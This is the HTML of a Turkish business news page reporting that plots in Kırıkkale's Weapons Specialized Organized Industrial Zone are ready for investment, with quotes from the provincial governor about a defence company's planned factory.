			<li class="span3"><a href="http://www.kobi-efor.com.tr/osb-tanitim/gebze-plastikciler-organize-sanayi-bolgesi-osb-40a-donusen-ilk-osb-olacak-h7015.html" title="“Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0’a dönüşen ilk OSB olacak”" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-osman_erkan-gebze_plastikciler_osb-osb-geposb.jpg" alt="“Gebze Plastikçiler Organize Sanayi Bölgesi, OSB 4.0’a dönüşen ilk OSB olacak”"  />
			<div class="caption-line"><p>Gebze Plastikçiler Organize Sanayi Bölgesi</p></div>						</a>
			</li>


		
           
          </ul>
          </div>
        </div>
        <!-- USTMANSET ***************************************************** -->
                      </div>
        </div>
        <div class="row">
                       <div class="page-header-fixed style span12 hide">
                <div class="title">OSB&#039;DEN HABER: <strong class="title"></strong>
                </div>
                <div class="pull-right">                  <span class="scroll-link" id="yorumyaplink"><i class="halflings-icon white comments"></i> Yorum Yap</span>                  <a class="print" href="javascript:window.print()"><i class="halflings-icon white print"></i> Yazdır</a>
                  <a href="javascript:void(0);" onclick="shareFacebook(fbThumb, fbUrl, fbTitle, fbDesc);" class="" rel="nofollow"><i class="halflings-icon white share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
                </div>
            </div>
           
          
          

          <div>
            
            <div id="main" class="span8">
              <div class="row-fulid">
                                                  <div id="breadcrumb">
    <ul class="breadcrumb">
    <li>Buradasınız: </li>
    <li><a href="http://www.kobi-efor.com.tr/">Ana Sayfa</a> <span class="divider">/</span></li>
    <li class="active"><a href="http://www.kobi-efor.com.tr/osb-den-haber">OSB&#039;DEN HABER</a></li>
  </ul>
</div>
  <article id="haber">
   
  <div class="page-header">
    <div class="row-fluid muted">
      <p class="pull-left">01 Aralık 2017 Cuma 08:40<br>Bu haber <b>5806</b> kez okundu.</p>
      <p class="pull-right karakterislem secilemez">
        <i class="glyphicons-icon font-down"></i>
        <i class="glyphicons-icon font-up"></i>
        <i class="glyphicons-icon font-normal"></i>
        <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
      </p>
    </div>
        <h1 class="title">Kırıkkale  Silah İhtisas  OSB’de arsalar hazır</h1><p class="lead">Kırıkkale Valisi Mehmet İlker Haktankaçmaz, Kırıkkale Silah İhtisas OSB’de gelinen durumu açıkladı. Silah İhtisas OSB&#039;nin Türkiye&#039;de ilk ve tek olduğunu vurgulayan Haktankaçmaz, şunları söyledi:</p>

  </div>
    <div class="row-fluid newspic"><img src="http://www.kobi-efor.com.tr/images/haberler/kirikkale_silah_ihtisas_osbde_arsalar_hazir_h7063_d7574.jpg" alt="Kırıkkale  Silah İhtisas  OSB&#039;de arsalar hazır" /></div>
   
      <div class="row-fluid page-social">
      <div class="span12">
        <div class="shr">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=K%C4%B1r%C4%B1kkale++Silah+%C4%B0htisas++OSB%E2%80%99de+arsalar+haz%C4%B1r&url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html&title=K%C4%B1r%C4%B1kkale++Silah+%C4%B0htisas++OSB%E2%80%99de+arsalar+haz%C4%B1r"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
      </div>
    </div>
  <div id="newstext" class="row-fluid page-content">
                          <p class="MsoPlainText"><span style="font-size: 12px;"><span style="font-family: Verdana;">"Şu anda tamamen yatırıma hazır durumdayız. Dikmen Savunma Sanayi A.Ş.'ye ön tahsis kararı aldık. <a href="http://www.kobi-efor.com.tr/haberleri/osb" title="OSB" target="_blank" class="klink">OSB</a>’de kuracakları tesislerde ilk etapta yaklaşık 10 milyon ve sonuçta 100 milyon dolarlık yatırım yapacaklar. Bir iki ay içinde fabrika bloklarının yükseldiğini göreceğiz. Başka ön tahsis aldığımız firmalar da var. Onların da sözleşmelerini imzalayacağız. Hem Kırıkkale ekonomisi hem de ülkemizin yerli savunma sanayinin gelişmesi açısından çok faydalı olacak."<br/></span><span style="font-family: Verdana;">Makine Kimya Endüstrisi Kurumu’na (MKEK) ait Arpalık Çukur mevkisindeki 500 dönüm arazi üzerine kurulan OSB'de yatırım yapacak girişimciler, 5. bölge teşvikinden yararlanabilecek. Silah İhtisas OSB'de kurulacak tesislerde her türlü silah, uçaksavar, her çap ve model tabanca, uzun ve kısa namlulu toplar, savunma sanayi yüksek teknoloji dijital ürünler, dürbünler, gece görüş kamera sistemleri, savunma sanayisine ait donanım, çipler ve yazılımlarla bunlara ait tüm yedek parçaların imalatı yapılacak.</span></span></p>
                  </div>

        <div class="row-fluid">
        <div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>



<div class="fb-like" data-href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>
<div class="btn-social-wrapper">
                <a class="btn-social btn-facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                    onclick="window.open(this.href, 'facebook-share','width=605,height=370');return false;"><i class="social-icon white facebook"></i> Facebook'ta Paylaş
                </a>
                <a class="btn-social btn-twitter" href="http://twitter.com/share?text=K%C4%B1r%C4%B1kkale++Silah+%C4%B0htisas++OSB%E2%80%99de+arsalar+haz%C4%B1r&url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                    onclick="window.open(this.href, 'twitter-share', 'width=570,height=290');return false;"><i class="social-icon white twitter"></i> Tweetle
                </a>
                <a class="btn-social btn-google" href="https://plus.google.com/share?url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white google_plus"></i> Google+ Paylaş
                </a>
                <a class="btn-social btn-linkedin" href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html&title=K%C4%B1r%C4%B1kkale++Silah+%C4%B0htisas++OSB%E2%80%99de+arsalar+haz%C4%B1r"
                   onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;"><i class="social-icon white linked_in"></i> LinkedIn'de Paylaş
                </a>
</div>



        </div>
</article>

      <div class="row-fluid galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="content">
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/carklar-daha-hizli-donecek-resimleri,44.html" title="Çarklar Daha Hızlı Dönecek">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/2013-ayarli-buyume_1.jpg" alt="Çarklar Daha Hızlı Dönecek" />
          <b>Çarklar Daha Hızlı...</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/turizm-resimleri,43.html" title="Turizm">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/turizm_2.jpg" alt="Turizm" />
          <b>Turizm</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/telekomunikasyon-resimleri,42.html" title="Telekomünikasyon">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/telekomunikasyon_1.jpg" alt="Telekomünikasyon" />
          <b>Telekomünikasyon</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.kobi-efor.com.tr/madencilik-resimleri,41.html" title="Madencilik">
          <img src="http://www.kobi-efor.com.tr/images/album/thumbs/madencilik_1.jpg" alt="Madencilik" />
          <b>Madencilik</b>
        </a>
      </div>
          </div>
  </div>
    <div id="yorumyap" style="margin:0"></div>
  <div class="row-fluid keywords"><div class="title"><span>Anahtar Kelimeler</span><hr></div><a href="http://www.kobi-efor.com.tr/haberleri/K%C4%B1r%C4%B1kkale++Silah+%C4%B0htisas++OSB" title="Kırıkkale  Silah İhtisas  OSB haberleri">Kırıkkale  Silah İhtisas  OSB</a><a href="http://www.kobi-efor.com.tr/haberleri/OSB" title="OSB haberleri">OSB</a></div>
    <section>
            <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/no_author.jpg" alt="Misafir Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">İsim</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                                                                <!--div class="input-prepend span6">
                                    <span class="add-on">E-Posta</span>
                                    <input name="email"  class="span9" type="text"  id="email" size="30" maxlength="50" value="" style="width: 202px;"  title="Yayınlanmayacak!" />
                                </div-->
                                                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" onfocus="textCheckFocus(this)" onblur="textCheckBlur(this)">Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!</textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(7063);return false;" class="btn btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="7063" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="718b7907c700d75cf7cf8fd3ac894a1f3ac4a2f0" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div> 
            
            
            
            </div> <!-- .tab-pane -->


                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.kobi-efor.com.tr/osb-den-haber/kirikkale-silah-ihtisas-osbde-arsalar-hazir-h7063.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->

 
  </section>
    <div class="box haberler">
    <div class="box header">
      <h5><i class="glyphicons-icon globe"></i> <b>İlgili Haberler</b></h5>
    </div>
    <div class="box content">
      <div class="row-fluid first">
              <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/diyarbakir-da-bagimsiz-tekstil-kenti-kuruluyor-h7062.html" title="Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’ kuruluyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diyarbakir_da_bagimsiz_tekstil_kenti_kuruluyor_h7062_960bb.jpg" alt="Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’ kuruluyor" />
            <b>Diyarbakır&#039;da bağımsız ‘Tekstil Kenti’...</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/ferizli-otomobil-ihtisas-sanayi-bolgesi-geliyor-h7061.html" title="Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ferizli_otomobil_ihtisas_sanayi_bolgesi_geliyor_h7061_37cd1.jpg" alt="Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor" />
            <b>Ferizli Otomobil İhtisas Sanayi Bölgesi geliyor</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/sanliurfada-turkiyenin-en-buyuk-besi-organize-sanayi-bolgesi-yapiliyor-h7034.html" title="Şanlıurfa’da Türkiye’nin en büyük Besi Organize Sanayi Bölgesi yapılıyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanliurfada_turkiyenin_en_buyuk_besi_organize_sanayi_bolgesi_yapiliyor_h7034_0fb17.jpg" alt="Şanlıurfa’da Türkiye’nin en büyük Besi Organize Sanayi Bölgesi yapılıyor" />
            <b>Şanlıurfa’da Türkiye’nin en büyük Besi Organize...</b>
          </a>
        </div>  
                </div> 
        <div class="row-fluid">
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/gebze-osbye-ar-ge-merkezi-h7033.html" title="Gebze OSB’ye Ar-Ge Merkezi">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gebze_osbye_ar_ge_merkezi_h7033_66b39.jpg" alt="Gebze OSB’ye Ar-Ge Merkezi" />
            <b>Gebze OSB’ye Ar-Ge Merkezi</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/erzincan-osb-gunesle-gelen-guc-h7032.html" title="Erzincan OSB: &quot;Güneşle Gelen Güç&quot;">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/erzincan_osb_gunesle_gelen_guc_h7032_f8d8f.jpg" alt="Erzincan OSB: &quot;Güneşle Gelen Güç&quot;" />
            <b>Erzincan OSB: &quot;Güneşle Gelen Güç&quot;</b>
          </a>
        </div>  
                      <div class="span3">
          <a href="http://www.kobi-efor.com.tr/osb-den-haber/alikahya-osbde-tesisler-yukseliyor-h7031.html" title="Alikahya OSB’de tesisler yükseliyor">
            <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/alikahya_osbde_tesisler_yukseliyor_h7031_9dcf4.jpg" alt="Alikahya OSB’de tesisler yükseliyor" />
            <b>Alikahya OSB’de tesisler yükseliyor</b>
          </a>
        </div>  
                    </div> 
    </div>
  </div>
   
                 
              </div>
            </div>
                        <div class="aside">
              <div id="sidebar" class="span4">
                <div class="row-fulid">
                                          <!-- REKLAM-26  -->
            <div class="reklam"><a href="http://www.kobi-efor.com.tr/banner.php?id=212" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/bilisim-2017_300x250.jpg&w=300&h=250&q=90" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner212" /></a></div>
                                                  <!-- ONE CIKANLAR  -->
            <div id="onecikanlar">
              <div class="header">
                <h5><i class="halflings-icon white star"></i>Reel Sektör Haberleri</h5>
                <a class="control left" href="#" id="onprev"></a>
                <a class="control right" href="#" id="onnext"></a>
              </div>
              <div class="content">
                  <div class="item">
                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/eta-felisten-odullerle-dondu-h7058.html" title="eTA, Felis&#039;ten ödüllerle döndü">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/eta_felisten_odullerle_dondu_h7058_ad28b.jpg" alt="eTA, Felis’ten ödüllerle döndü" />
                    <p>eTA, Felis’ten ödüllerle döndü</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tcmb-11-milyon-euroluk-fon-icerisinde-yer-aliyor-h7055.html" title="TÇMB, 11 milyon Euro&#039;luk fon içerisinde yer alıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tcmb_11_milyon_euroluk_fon_icerisinde_yer_aliyor_h7055_b9fa2.jpg" alt="TÇMB, 11 milyon Euro’luk fon içerisinde yer alıyor" />
                    <p>TÇMB, 11 milyon Euro’luk fon içerisinde yer alıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/asgari-ucrete-destek-surmeli-h7048.html" title="Asgari ücrete destek sürmeli">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/asgari_ucrete_destek_surmeli_h7048_0a7b9.jpg" alt="Asgari ücrete destek sürmeli" />
                    <p>Asgari ücrete destek sürmeli</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/siber-zorba-olma-farkinavar-h7060.html" title="&#039;Siber Zorba Olma!” #farkinavar">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/siber_zorba_olma_farkinavar_h7060_3f4d8.jpg" alt="“Siber Zorba Olma!” #farkinavar" />
                    <p>“Siber Zorba Olma!” #farkinavar</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/is-leasing-yatirimciya-destegini-surduruyor-h7036.html" title="İş Leasing, yatırımcıya desteğini sürdürüyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/is_leasing_yatirimciya_destegini_surduruyor_h7036_05735.jpg" alt="İş Leasing, yatırımcıya desteğini sürdürüyor" />
                    <p>İş Leasing, yatırımcıya desteğini sürdürüyor</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/cin-turk-firmalarini-8-trilyon-dolarlik-pazara-davet-etti-h7044.html" title="Çin, Türk firmalarını 8 trilyon dolarlık pazara davet etti">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cin_turk_firmalarini_8_trilyon_dolarlik_pazara_davet_etti_h7044_a8e25.jpg" alt="Çin, Türk firmalarını 8 trilyon dolarlık pazara davet etti" />
                    <p>Çin, Türk firmalarını 8 trilyon dolarlık pazara davet etti</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/makfed-adnan-dalgakiran-ile-devam-edecek-h7059.html" title="MAKFED Adnan Dalgakıran ile devam edecek">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/makfed_adnan_dalgakiran_ile_devam_edecek_h7059_7cdbb.jpg" alt="MAKFED Adnan Dalgakıran ile devam edecek" />
                    <p>MAKFED Adnan Dalgakıran ile devam edecek</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/g3-forum-1500-girisimciyi-is-dunyasi-ile-bulusturdu-h7045.html" title="G3 Forum 1500 girişimciyi iş dünyası ile buluşturdu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/g3_forum_1500_girisimciyi_is_dunyasi_ile_bulusturdu_h7045_ea027.jpg" alt="G3 Forum 1500 girişimciyi iş dünyası ile buluşturdu" />
                    <p>G3 Forum 1500 girişimciyi iş dünyası ile buluşturdu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/rekonomi-istanbulda-gerceklestirildi-h7039.html" title="&#039;REkonomi” İstanbul&#039;da gerçekleştirildi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/rekonomi_istanbulda_gerceklestirildi_h7039_0ebf3.jpg" alt="“REkonomi” İstanbul’da gerçekleştirildi" />
                    <p>“REkonomi” İstanbul’da gerçekleştirildi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/teknoloji-transferi-hizlaniyor-h7047.html" title="Teknoloji transferi ‘hızlanıyor&#039;">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/teknoloji_transferi_hizlaniyor_h7047_370d1.jpg" alt="Teknoloji transferi ‘hızlanıyor’" />
                    <p>Teknoloji transferi ‘hızlanıyor’</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/kayit-disi-istihdama-esnek-bariyer-h7046.html" title="Kayıt dışı istihdama esnek bariyer">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kayit_disi_istihdama_esnek_bariyer_h7046_ea3cb.jpg" alt="Kayıt dışı istihdama esnek bariyer" />
                    <p>Kayıt dışı istihdama esnek bariyer</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/finans-kulup-baskanligina-dr-onder-halisdemir-secildi-h7040.html" title="Finans Kulüp Başkanlığı&#039;na Dr. Önder Halisdemir seçildi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_kulup_baskanligina_dr_onder_halisdemir_secildi_h7040_201dc.jpg" alt="Finans Kulüp Başkanlığı’na Dr. Önder Halisdemir seçildi" />
                    <p>Finans Kulüp Başkanlığı’na Dr. Önder Halisdemir seçildi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/en-buyuk-gemiler-aliagada-konuk-olacak-h7056.html" title="En büyük gemiler Aliağa&#039;da konuk olacak">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/en_buyuk_gemiler_aliagada_konuk_olacak_h7056_9a4a3.jpg" alt="En büyük gemiler Aliağa’da konuk olacak" />
                    <p>En büyük gemiler Aliağa’da konuk olacak</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/girisimcilere-bir-gunde-17-milyon-tl-h7057.html" title="Girişimcilere bir günde 17 milyon TL">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/girisimcilere_bir_gunde_17_milyon_tl_h7057_e7c1d.jpg" alt="Girişimcilere bir günde 17 milyon TL" />
                    <p>Girişimcilere bir günde 17 milyon TL</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tusiad-ile-turkonfed-in-hayata-gecirdigi-borgip-kobi-leri-guclendirecek-h7041.html" title="TÜSİAD ile TÜRKONFED&#039;in hayata geçirdiği BORGİP KOBİ&#039;leri güçlendirecek">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tusiad_ile_turkonfed_in_hayata_gecirdigi_borgip_kobi_leri_guclendirecek_h7041_a63d9.jpg" alt="TÜSİAD ile TÜRKONFED&#039;in hayata geçirdiği BORGİP KOBİ&#039;leri güçlendirecek" />
                    <p>TÜSİAD ile TÜRKONFED&#039;in hayata geçirdiği BORGİP KOBİ&#039;leri güçlendirecek</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/hug-yeni-girisimcileri-bekliyor-h7053.html" title="HUG yeni girişimcileri bekliyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hug_yeni_girisimcileri_bekliyor_h7053_705b6.jpg" alt="HUG yeni girişimcileri bekliyor" />
                    <p>HUG yeni girişimcileri bekliyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turkiye-surprizlerle-dolu-h7049.html" title="Türkiye: Sürprizlerle dolu">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_surprizlerle_dolu_h7049_926ca.jpg" alt="Türkiye: Sürprizlerle dolu" />
                    <p>Türkiye: Sürprizlerle dolu</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/verifonedan-her-ihtiyaca-uygun-yazarkasa-h7042.html" title="Verifone&#039;dan her ihtiyaca uygun yazarkasa">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/verifonedan_her_ihtiyaca_uygun_yazarkasa_h7042_2e809.jpg" alt="Verifone’dan her ihtiyaca uygun yazarkasa" />
                    <p>Verifone’dan her ihtiyaca uygun yazarkasa</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ogrencilerin-staj-kabusu-timstaj-ile-sona-erecek-h7043.html" title="Öğrencilerin staj kabusu TİMSTAJ ile sona erecek">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ogrencilerin_staj_kabusu_timstaj_ile_sona_erecek_h7043_5eda7.jpg" alt="Öğrencilerin staj kabusu TİMSTAJ ile sona erecek" />
                    <p>Öğrencilerin staj kabusu TİMSTAJ ile sona erecek</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turksat-5a-ve-5b-uydulari-icin-imzalar-atildi-h7038.html" title="Türksat 5A ve 5B uyduları için imzalar atıldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turksat_5a_ve_5b_uydulari_icin_imzalar_atildi_h7038_4d0be.jpg" alt="Türksat 5A ve 5B uyduları için imzalar atıldı" />
                    <p>Türksat 5A ve 5B uyduları için imzalar atıldı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/boeing-turkiye-havacilik-sanayii-gelistirme-programi-basladi-h7054.html" title="Boeing Türkiye Havacılık Sanayii Geliştirme Programı başladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/boeing_turkiye_havacilik_sanayii_gelistirme_programi_basladi_h7054_00938.jpg" alt="Boeing Türkiye Havacılık Sanayii Geliştirme Programı başladı" />
                    <p>Boeing Türkiye Havacılık Sanayii Geliştirme Programı başladı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/kadooglu-orta-demokrasi-tuzagini-asmaliyiz-h7050.html" title="Kadooğlu: Orta demokrasi tuzağını aşmalıyız">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kadooglu_orta_demokrasi_tuzagini_asmaliyiz_h7050_f4f0c.jpg" alt="Kadooğlu: Orta demokrasi tuzağını aşmalıyız" />
                    <p>Kadooğlu: Orta demokrasi tuzağını aşmalıyız</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turk-telekom-ve-tubitak-bilgem-isbirligi-h7037.html" title="Türk Telekom ve TÜBİTAK BİLGEM işbirliği">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_telekom_ve_tubitak_bilgem_isbirligi_h7037_0fd7d.jpg" alt="Türk Telekom ve TÜBİTAK BİLGEM işbirliği" />
                    <p>Türk Telekom ve TÜBİTAK BİLGEM işbirliği</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/immib-basarili-tasarimcilarini-odullendirdi-h7035.html" title="İMMİB başarılı tasarımcılarını ödüllendirdi">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/immib_basarili_tasarimcilarini_odullendirdi_h7035_b405c.jpg" alt="İMMİB başarılı tasarımcılarını ödüllendirdi" />
                    <p>İMMİB başarılı tasarımcılarını ödüllendirdi</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/kyocera-ecosys-25-yilinda-h7052.html" title="Kyocera ECOSYS 25. yılında">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kyocera_ecosys_25_yilinda_h7052_0bbab.jpg" alt="Kyocera ECOSYS 25. yılında" />
                    <p>Kyocera ECOSYS 25. yılında</p>
                  </a>
                  
                                  </div>
